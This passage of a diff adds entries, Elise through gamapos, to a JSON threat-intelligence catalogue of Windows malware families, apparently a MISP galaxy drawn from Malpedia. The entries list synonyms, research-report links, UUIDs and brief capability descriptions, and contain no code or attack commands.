+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise",
+ "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
+ "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
+ "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://www.joesecurity.org/blog/8409877569366580427"
+ ]
+ },
+ "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
+ "value": "Elise",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
+ "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
+ "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html"
+ ]
+ },
+ "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
+ "value": "Emdivi",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader",
+ "https://twitter.com/thor_scanner/status/992036762515050496"
+ ]
+ },
+ "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b",
+ "value": "Empire Downloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Lurid"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal",
+ "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
+ "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf",
+ "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
+ ]
+ },
+ "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9",
+ "value": "Enfal",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug",
+ "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html",
+ "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
+ "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/",
+ "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf"
+ ]
+ },
+ "uuid": "c4490972-3403-4043-9d61-899c0a440940",
+ "value": "EquationDrug",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup",
+ "https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
+ "https://laanwj.github.io/2016/09/17/seconddate-cnc.html",
+ "https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
+ "https://laanwj.github.io/2016/09/11/buzzdirection.html",
+ "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html",
+ "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html",
+ "https://laanwj.github.io/2016/09/01/tadaqueos.html",
+ "https://laanwj.github.io/2016/08/28/feintcloud.html",
+ "https://laanwj.github.io/2016/08/22/blatsting.html"
+ ]
+ },
+ "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af",
+ "value": "Equationgroup (Sorting)",
+ "description": "Rough collection EQGRP samples, to be sorted"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus",
+ "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/"
+ ]
+ },
+ "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
+ "value": "Erebus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel",
+ "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab"
+ ]
+ },
+ "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab",
+ "value": "Eredel",
+ "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot"
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ExPetr",
+ "Pnyetya",
+ "Petna",
+ "NotPetya",
+ "Nyetya",
+ "NonPetya",
+ "nPetya",
+ "Diskcoder.C",
+ "BadRabbit"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya",
+ "https://securelist.com/schroedingers-petya/78870/",
+ "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
+ "https://securelist.com/from-blackenergy-to-expetr/78937/",
+ "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
+ "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
+ "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/",
+ "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
+ "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
+ "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/",
+ "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
+ "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/",
+ "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/",
+ "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
+ "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
+ "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/",
+ "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
+ "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
+ "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/",
+ "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
+ "https://securelist.com/bad-rabbit-ransomware/82851/",
+ "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
+ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
+ "http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
+ "http://www.intezer.com/notpetya-returns-bad-rabbit/",
+ "https://www.riskiq.com/blog/labs/badrabbit/",
+ "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
+ "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
+ "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
+ "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html"
+ ]
+ },
+ "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba",
+ "value": "EternalPetya",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "HighTide"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot",
+ "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf",
+ "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise",
+ "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
+ ]
+ },
+ "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe",
+ "value": "EtumBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny",
+ "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
+ "https://www.cyphort.com/evilbunny-malware-instrumented-lua/"
+ ]
+ },
+ "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3",
+ "value": "Evilbunny",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Vidgrab"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab",
+ "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf"
+ ]
+ },
+ "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
+ "value": "EvilGrab",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "CREstealer"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony",
+ "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware",
+ "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/",
+ "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/"
+ ]
+ },
+ "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189",
+ "value": "EvilPony",
+ "description": "Privately modded version of the Pony stealer."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial",
+ "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/"
+ ]
+ },
+ "uuid": "af3a3ece-e67f-457a-be72-7651bc720342",
+ "value": "Evrial",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Sabresac",
+ "Saber"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur",
+ "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+ ]
+ },
+ "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98",
+ "value": "Excalibur",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://github.com/nccgroup/Royal_APT"
+ ]
+ },
+ "uuid": "74f8db32-799c-41e5-9815-6272908ede57",
+ "value": "MS Exchange Tool",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ExtRat"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat",
+ "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
+ "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017",
+ "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat"
+ ]
+ },
+ "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38",
+ "value": "Xtreme RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid",
+ "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/",
+ "http://blog.talosintel.com/2017/01/Eye-Pyramid.html"
+ ]
+ },
+ "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22",
+ "value": "Eye Pyramid",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "WillExec"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga",
+ "https://github.com/360netlab/DGA/issues/36",
+ "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
+ "http://www.freebuf.com/column/153424.html"
+ ]
+ },
+ "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789",
+ "value": "FakeDGA",
+ "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Braviax"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean",
+ "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/",
+ "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/",
+ "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv"
+ ]
+ },
+ "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4",
+ "value": "FakeRean",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc",
+ "http://www.welivesecurity.com/2015/07/30/operation-potao-express/"
+ ]
+ },
+ "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942",
+ "value": "FakeTC",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny",
+ "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1"
+ ]
+ },
+ "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e",
+ "value": "Fanny",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt",
+ "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/"
+ ]
+ },
+ "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034",
+ "value": "FantomCrypt",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos",
+ "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
+ "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf"
+ ]
+ },
+ "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914",
+ "value": "FastPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus",
+ "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments"
+ ]
+ },
+ "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0",
+ "value": "Felismus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot",
+ "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257",
+ "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html"
+ ]
+ },
+ "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018",
+ "value": "Felixroot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Cridex",
+ "Bugat"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo",
+ "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
+ "https://feodotracker.abuse.ch/",
+ "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
+ "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html"
+ ]
+ },
+ "uuid": "66781866-f064-467d-925d-5e5f290352f0",
+ "value": "Feodo",
+ "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat",
+ "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html"
+ ]
+ },
+ "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8",
+ "value": "FF RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom",
+ "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/"
+ ]
+ },
+ "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933",
+ "value": "FileIce",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Poseidon"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos",
+ "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/",
+ "https://blogs.cisco.com/security/talos/poseidon"
+ ]
+ },
+ "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba",
+ "value": "FindPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "FinSpy"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher",
+ "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
+ "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html",
+ "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
+ "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
+ "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"
+ ]
+ },
+ "uuid": "541b64bc-87ec-4cc2-aaee-329355987853",
+ "value": "FinFisher RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball",
+ "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/"
+ ]
+ },
+ "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3",
+ "value": "Fireball",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt",
+ "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/"
+ ]
+ },
+ "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd",
+ "value": "FireCrypt",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv",
+ "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
+ ]
+ },
+ "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c",
+ "value": "FireMalv",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom",
+ "https://twitter.com/JaromirHorejsi/status/815949909648150528"
+ ]
+ },
+ "uuid": "1ab17959-6254-49af-af26-d34e87073e49",
+ "value": "FirstRansom",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy",
+ "https://github.com/Coldzer0/Ammyy-v3",
+ "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
+ "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat"
+ ]
+ },
+ "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4",
+ "value": "FlawedAmmyy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy",
+ "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
+ ]
+ },
+ "uuid": "4305d59a-0d07-4021-a902-e7996378898b",
+ "value": "FlexiSpy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot",
+ "http://blog.talosintel.com/2016/12/flokibot-collab.html#more",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
+ "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/",
+ "http://adelmas.com/blog/flokibot.php",
+ "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/",
+ "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
+ "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/",
+ "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/"
+ ]
+ },
+ "uuid": "057ff707-a008-4ab8-8370-22b689ed3412",
+ "value": "FlokiBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif",
+ "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library"
+ ]
+ },
+ "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd",
+ "value": "Floxif",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc",
+ "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/"
+ ]
+ },
+ "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03",
+ "value": "Flusihoc",
+ "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber",
+ "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html",
+ "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/",
+ "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
+ "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html"
+ ]
+ },
+ "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0",
+ "value": "Fobber",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook",
+ "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
+ "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/",
+ "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html",
+ "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
+ "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
+ "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
+ "https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
+ ]
+ },
+ "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50",
+ "value": "Formbook",
+ "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ffrat"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat",
+ "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
+ ]
+ },
+ "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402",
+ "value": "FormerFirstRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki",
+ "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
+ ]
+ },
+ "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1",
+ "value": "Freenki Loader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "BitPaymer"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex",
+ "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
+ ]
+ },
+ "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d",
+ "value": "FriedEx",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim",
+ "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f",
+ "https://sentinelone.com/blogs/sfg-furtims-parent/"
+ ]
+ },
+ "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
+ "value": "Furtim",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader"
+ ]
+ },
+ "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe",
+ "value": "GalaxyLoader",
+ "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n"
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "pios"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos",
+ "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf"
+ ]
+ },
+ "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66",
+ "value": "gamapos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
